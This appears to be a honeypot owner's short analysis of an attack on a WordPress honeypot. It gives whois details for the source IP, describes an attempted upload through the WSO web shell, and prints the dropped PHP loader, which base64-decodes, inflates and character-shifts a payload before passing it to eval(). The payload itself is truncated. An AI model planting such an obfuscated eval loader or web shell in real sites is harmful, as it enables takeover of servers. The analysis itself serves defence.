A fairly basic decoder.
195.154.220.30 has DNS name 30.220.154.rdns.systems
rdns.systems has this whois info:
Domain Name: rdns.systems
Tech Organization: Technology LLC
Tech Street: c/o IDPS International Domain Privacy Services GmbH Hansaallee 191
Tech City: Duesseldorf
Tech State/Province:
Tech Postal Code: 40549
Tech Country: DE
195.154.220.30 has different whois info:
route: 195.154.0.0/16
descr: Online SAS
descr: Paris, France
origin: AS12876
mnt-by: MNT-TISCALIFR
created: 2013-08-02T09:05:22Z
last-modified: 2013-08-02T09:05:22Z
The attacker intended to use a WSO, "Web Shell by oRb" instance to download the code to my WordPress honey pot. The attacker wanted to use the "FilesMan" action of WSO, "uploadFile" sub-action.
This would leave a file behind.
<?php
function fUUPd($NVAR)
{
$NVAR = gzinflate(base64_decode($NVAR));
for ($i = 0; $i < strlen($NVAR); $i++) {
$NVAR[$i] = chr(ord($NVAR[$i]) - 1);
}
return $NVAR;
}
eval(fUUPd("jbvnz.../9y//5f/x/"));
Decompresses decoded Base64-encoded bytes, then shifts them one (numeric) value down. So for ASCII text, 'G' (0x47 as a number) would become 'F' (0x46 as a number). That counts as a "Caesar Cipher".
Makes no attempt to hide the base64_decode() or eval() function calls,
but the function name fUUPd does seem to be obfuscated.